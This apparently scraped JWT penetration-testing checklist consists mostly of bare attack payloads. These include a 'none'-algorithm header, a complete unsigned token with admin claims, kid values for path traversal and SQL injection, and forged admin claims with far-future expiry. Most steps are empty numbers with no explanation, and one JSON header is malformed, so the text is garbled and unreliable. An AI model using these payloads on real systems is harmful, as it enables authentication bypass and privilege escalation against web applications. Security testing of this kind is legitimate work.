JSON Web Tokens
Check List
Methodology
None Algorithm
1
2
3
{
"alg": "HS256",
"typ": "JWT"
}{
"user": "guest",
"role": "user"
}4
{
"alg": "none",
typ": "JWT"
}5
{
"user": "admin",
"role": "admin",
"iat": 1731670400,
"exp": 9999999999
}6
7
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4iLCJyb2xlIjoiYWRtaW4iLCJpYXQiOjE3MzE2NzA0MDAsImV4cCI6OTk5OTk5OTk5OX0.8
9
KID Manipulation Vulnerability
1
2
3
4
{
"alg": "HS256",
"typ": "JWT",
"kid": "1"
}5
{
"alg": "HS256",
"typ": "JWT",
"kid": "../../public/css/style.css"
}6
7
8
9
SQL Injection Via KID
1
{
"alg": "HS256",
"typ": "JWT",
"kid": "1' UNION SELECT 'mysecret'--"
}2
3
4
5
JWT Forging via Default Secret Exploitation
1
2
3
4
5
6
7
{
"sub": "1",
"role": "admin",
"role_id": 1,
"exp": 9999999999
}8
9
10
11
JWT Refresh Token Association Bypass
1
2
3
4
5
6
7
Replay Attack
1
2
3
4
5
White Box
Cheat Sheet
Last updated